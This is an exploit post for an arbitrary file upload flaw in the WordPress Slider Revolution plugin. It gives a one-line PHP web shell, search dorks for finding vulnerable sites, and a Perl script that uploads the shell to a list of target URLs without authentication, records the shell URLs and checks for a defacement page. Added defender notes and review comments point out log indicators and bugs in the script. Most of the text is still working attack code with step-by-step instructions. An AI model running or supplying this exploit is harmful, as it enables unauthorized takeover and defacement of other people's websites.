=================================================================================================
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |
| # Author    : indoushka                                                                       |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            | 
| # Vendor    : https://www.sliderrevolution.com/                                               |  
| # Dork      : index off revslider\backup                                                      |  
                plugins/revslider/public/assets/css/settings.css                                |
                revslider.php "index of"	                                                    |                                  
                wp-content/plugins/revslider/ 2013	                                            |
=================================================================================================

[+] poc :

[+] Web shell upload :

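    The following Perl exploit attempts to upload a backdoor through the plugin's update_plugin function, which the script reaches through the revslider_ajax_action action of wp-admin/admin-ajax.php without sending a session cookie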
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]
	Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension
    Because the exploit uploads a compressed file to the target
	
[+] simple backdoor	:

     <?php
     // Minimal web shell: the value of the `cmd` query-string parameter is handed
     // to system() unchanged, so any client that can request this file runs OS
     // commands with the privileges of the PHP process.
     // Detection: search the web root (here, the plugin's temp/update_extract
     // directory) for PHP files that pass $_GET values straight to system(), and
     // look for requests carrying a `cmd=` parameter to files under wp-content/plugins/.
     $cmd = $_GET['cmd'];
     system($cmd);
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] Save the following Perl exploit to a text file with the .pl extension ( poc.pl ). Perl must be installed on your machine.

[+] Perl exploit :
 
#!/usr/bin/perl
#
# Batch client for the Slider Revolution (revslider) update_plugin upload flaw.
# For every base URL in the list file named by the first argument it:
#   1. GETs wp-admin/admin-ajax.php to see whether the endpoint answers,
#   2. POSTs a multipart form (action=revslider_ajax_action,
#      client_action=update_plugin, update_file=revslider.zip) with an empty
#      Cookie header, i.e. without a logged-in session,
#   3. GETs wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php
#      to see whether the extracted file is served,
#   4. GETs leet.html at the site root (the script itself never uploads it).
#
# Defender notes, derived from the requests below:
#   - Web-log indicators: a POST to wp-admin/admin-ajax.php carrying
#     action=revslider_ajax_action and client_action=update_plugin from a client
#     with no session, followed by a GET below
#     wp-content/plugins/revslider/temp/update_extract/.
#   - Host indicators: unexpected files, PHP in particular, under the plugin's
#     temp/update_extract directory.
#   - Mitigation: move to a vendor release that fixes the upload handler (the
#     advisory title names 4.x.x as affected) and deny script execution under
#     the plugin's temp directory.
#
# NOTE(review): the script runs without `use strict` / `use warnings`, and
# $target below is a package global.
 
use LWP::UserAgent;
 
# Clear the terminal; the command is chosen from the OS name in $^O.
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
# Print the banner. head() is defined further down, inside the loop body; a
# named sub is installed at compile time, so calling it here works.
head();
 
# Require one argument: the path of the file that lists the base URLs.
my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";
die "$usage" unless $ARGV[0];
 
# NOTE(review): two-argument open with a bareword handle; the mode is part of
# the same string as the command-line argument.
open(tarrget,"<$ARGV[0]") or die "$!";
# One iteration per line of the list file; the line is used as a base URL.
while(<tarrget>){
chomp($_);
$target = $_;
 
my $path = "wp-admin/admin-ajax.php";
 
print "\nTarget => $target\n";
 
# verify_hostname => 0 turns off TLS certificate hostname verification, so the
# client also talks to hosts whose certificate does not match.
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
# Fixed User-Agent string. It is a weak log indicator at best, because it is a
# plain string literal that any copy of the script can change.
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
# Reachability probe: any successful response from admin-ajax.php passes. It
# does not show that the plugin is installed.
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n  [+] Xploit Possibility Work :3\n \n";
 
 
 
print "  [*] Try Exploiting Vulnerability\n";
print "  [*] Xploiting $target\n";
 
# Multipart POST that submits the local file revslider.zip as `update_file`.
# The Cookie header is sent empty, so the request carries no WordPress session.
my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
 
print "  [*] Sent payload\n";
 
# The script takes this response text as the sign that the archive was accepted.
# NOTE(review): presumably the plugin's message after unpacking an archive that
# lacks the expected update layout - confirm against the plugin source.
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "  [+] Payload successfully executed\n";
 
print "  [*] Checking if shell was uploaded\n";
# Fetch the path where the extracted cmd.php would be served.
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
# Any body containing "<br>" counts as success, including an error page that
# happens to contain that tag; the result is not proof of compromise.
if($check =~/<br>/) {
 
    print "  [+] Shell successfully uploaded\n";
    # Append the URL to Shell.txt in the current directory. The open() result
    # is not checked.
    open(save, '>>Shell.txt');
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";
    close(save);
 
 
print "  [*] Checking if Deface was uploaded now\n";
 
my $def = $ua->get("$target/leet.html")->content;
# NOTE(review): `= ~/Hacked/` is an assignment of a bitwise complement, not a
# regex bind on the response; the match runs against $_ (the list line), so the
# message printed below does not reflect the fetched page - confirm.
if($def = ~/Hacked/) {
 
print "  [+] Deface uploaded successfull\n";
 
 
} else {print "   [-] Deface not Uploaded :/"; }
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }
} else {
print "  [-] Payload failed: Fail\n";
print "\n";
 
}
} else { print "\n [-]Xploit Fail \n"}
 
# Banner printer. It is written inside the while block, but a named sub is
# package-scoped, which is why the call before the loop resolves.
sub head {
print "\t   +===============================================\n";
print "\t   | Auto Exploiter Revslider Shell Upload \n";
print "\t   | Edited: indoushka\n";
print "\t   +===============================================\n";
}
}

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |
                                                                                                                                      |
=======================================================================================================================================